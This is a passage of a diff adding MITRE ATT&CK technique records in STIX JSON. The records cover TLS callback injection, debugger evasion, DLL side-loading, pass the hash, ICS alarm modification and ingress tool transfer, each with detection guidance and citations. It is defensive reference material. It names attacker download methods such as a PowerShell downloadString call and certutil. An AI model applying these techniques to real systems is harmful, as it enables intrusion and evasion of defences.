"https://attack.mitre.org/techniques/T1538", + "external_id": "T1538" + }, + { + "source_name": "AWS Console Sign-in Events", + "description": "Amazon. (n.d.). AWS Console Sign-in Events. Retrieved October 23, 2019.", + "url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html" + }, + { + "source_name": "Google Command Center Dashboard", + "description": "Google. (2019, October 3). Quickstart: Using the dashboard. Retrieved October 8, 2019.", + "url": "https://cloud.google.com/security-command-center/docs/quickstart-scc-dashboard" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Thread Local Storage", + "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", + "created": "2020-01-14T01:30:41.092Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/005", + "external_id": "T1055.005" + }, + { + "source_name": "FireEye TLS Nov 2017", + "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Debugger Evasion", + "description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)\n\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\n\nSpecific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)\n\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "TruKno" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Debugger related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to debugger identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious [Native API](https://attack.mitre.org/techniques/T1106) function calls as well as processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.\n\nMonitor debugger logs for signs of abnormal and potentially malicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "created": "2022-04-01T17:59:46.156Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1622", + "external_id": "T1622" + }, + { + "source_name": "Checkpoint Dridex Jan 2021", + "description": "Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.", + "url": "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/" + }, + { + "source_name": "hasherezade debug", + "description": "hasherezade. (2021, June 30). Module 3 - Understanding and countering malware's evasion and self-defence. Retrieved April 1, 2022.", + "url": "https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf" + }, + { + "source_name": "AlKhaser Debug", + "description": "Noteworthy. (2019, January 6). Al-Khaser. Retrieved April 1, 2022.", + "url": "https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug" + }, + { + "source_name": "wardle evilquest partii", + "description": "Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.", + "url": "https://objective-see.com/blog/blog_0x60.html" + }, + { + "source_name": "ProcessHacker Github", + "description": "ProcessHacker. (2009, October 27). Process Hacker. Retrieved April 11, 2022.", + "url": "https://github.com/processhacker/processhacker" + }, + { + "source_name": "vxunderground debug", + "description": "vxunderground. (2021, June 30). VX-API. Retrieved April 1, 2022.", + "url": "https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:52.873Z", + "name": "Space after Filename", + "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Erye Hernandez, Palo Alto Networks" + ], + "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "created": "2020-02-10T20:47:10.082Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/006", + "external_id": "T1036.006" + }, + { + "source_name": "Mac Backdoors are back", + "description": "Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.", + "url": "https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Re-opened Applications", + "description": "Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to \"Reopen windows when logging back in\".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.\n\nAdversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e", + "created": "2020-01-24T18:15:06.641Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/007", + "external_id": "T1547.007" + }, + { + "source_name": "Re-Open windows on Mac", + "description": "Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017.", + "url": "https://support.apple.com/en-us/HT204005" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "Wardle Persistence Chapter", + "description": "Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.", + "url": "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-13T20:35:52.302Z", + "name": "SEO Poisoning", + "description": "Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)\n\nTo help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)\n\nAdversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)\n\nSEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Goldstein Menachem", + "Vijay Lalwani", + "Will Thomas, Equinix Threat Analysis Center (ETAC)", + "Will Jolliffe", + "Hiroki Nagahama, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India", + "Pooja Natarajan, NEC Corporation India" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e5d550f3-2202-4634-85f2-4a200a1d49b3", + "created": "2022-09-30T21:14:12.284Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1608/006", + "external_id": "T1608.006" + }, + { + "source_name": "MalwareBytes SEO", + "description": "Arntz, P. (2018, May 29). SEO poisoning: Is it worth it?. Retrieved September 30, 2022.", + "url": "https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it" + }, + { + "source_name": "Atlas SEO", + "description": "Atlas Cybersecurity. (2021, April 19). Threat Actors use Search-Engine-Optimization Tactics to Redirect Traffic and Install Malware. Retrieved September 30, 2022.", + "url": "https://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-redirect-traffic-and-install-malware/" + }, + { + "source_name": "Sophos Gootloader", + "description": "Szappanos, G. & Brandt, A. (2021, March 1). “Gootloader” expands its payload delivery options. Retrieved September 30, 2022.", + "url": "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/" + }, + { + "source_name": "DFIR Report Gootloader", + "description": "The DFIR Report. (2022, May 9). SEO Poisoning – A Gootloader Story. Retrieved September 30, 2022.", + "url": "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/" + }, + { + "source_name": "ZScaler SEO", + "description": "Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved September 30, 2022.", + "url": "https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:12.528Z", + "name": "Modify Alarm Settings", + "description": "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. \n\nIf an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur. \n\nIn ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0838", + "external_id": "T0838" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-07-28T18:24:16.246Z", + "name": "Pass the Hash", + "description": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Blake Strom, Microsoft 365 Defender", + "Travis Smith, Tripwire" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\n\nEvent ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "System Access Controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", + "created": "2020-01-30T16:36:51.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1550/002", + "external_id": "T1550.002" + }, + { + "source_name": "Stealthbits Overpass-the-Hash", + "description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.", + "url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Exfiltration Over Physical Medium", + "description": "Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "William Cain" + ], + "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Presence of physical medium or device" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "created": "2017-05-31T21:30:46.461Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1052", + "external_id": "T1052" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "DLL Side-Loading", + "description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "created": "2020-03-13T19:41:37.908Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/002", + "external_id": "T1574.002" + }, + { + "source_name": "FireEye DLL Side-Loading", + "description": "Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-11T15:08:01.731Z", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "John Page (aka hyp3rlinx), ApparitionSec", + "Mark Wee", + "Shailesh Tiwary (Indian Army)", + "The DFIR Report", + "Alain Homewood", + "Joe Wise", + "Jeremy Hedges", + "Selena Larson, @selenalarson" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows netsh interface portproxy modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "created": "2017-05-31T21:31:16.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1105", + "external_id": "T1105" + }, + { + "source_name": "T1105: Trellix_search-ms", + "description": " Mathanraj Thangaraju, Sijo Jacob. (2023, July 26). Beyond File Search: A Novel Method for Exploiting the \"search-ms\" URI Protocol Handler. Retrieved March 15, 2024.", + "url": "https://www.trellix.com/blogs/research/beyond-file-search-a-novel-method/" + }, + { + "source_name": "Dropbox Malware Sync", + "description": "David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.", + "url": 